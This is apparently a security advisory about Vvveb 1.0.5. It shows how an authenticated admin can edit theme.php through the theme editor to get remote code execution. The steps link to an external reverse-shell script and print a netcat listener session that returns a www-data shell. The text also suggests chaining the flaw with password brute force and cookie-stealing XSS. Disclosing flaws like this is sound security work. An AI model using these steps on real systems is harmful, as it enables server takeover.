Vvveb 1.0.5 | Non-validated Theme Editing Allows Privilege Abuse and RCE

Admins have access to modify the code of plugins and run it without any validation in place to prevent malicious code execution. An authenticated admin can modify plugins through this endpoint: [/vadmin123/index.php?module=editor/code&type=themes].

Through this endpoint, you can modify code of a PHP file (theme.php) to gain shell access on the webserver.

Reproduce

To reproduce RCE, open the following endpoint:
/vadmin123/index.php?module=editor/code&type=themes

Find and edit theme.php, replace its code with the following shell:
https://gist.github.com/0xHamy/f16fb399f8dd3a973acadc18fa07b1cb

Remember to replace the IP and port with the IP and port of your listener, you can use a listener such as netcat.

Save the PHP file and run it by opening the following page:
/vadmin123/index.php?module=editor/editor&url=/&template=index.html

Watch your netcat listener and you will get a reverse shell connection:

$ nc -lnvp 6060
Listening on 0.0.0.0 6060
Connection received on 127.0.0.1 33862
Linux hx0 6.8.0-51-generic #52-Ubuntu SMP PREEMPT_DYNAMIC Thu Dec  5 13:09:44 UTC 2024 x86_64 Linux
sh: w: not found
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)
/bin/sh: can't access tty; job control turned off
/ $

On its own this vulnerability may not hold any impact but when combined with password bruteforce on admin panel and XSS that leads to cookie stealing, it becomes quite impactful and results in full compromise.

Search my website for more vulnerabilities found in Vvveb to get a full understanding of the attack vectors you could use during your penetration tests.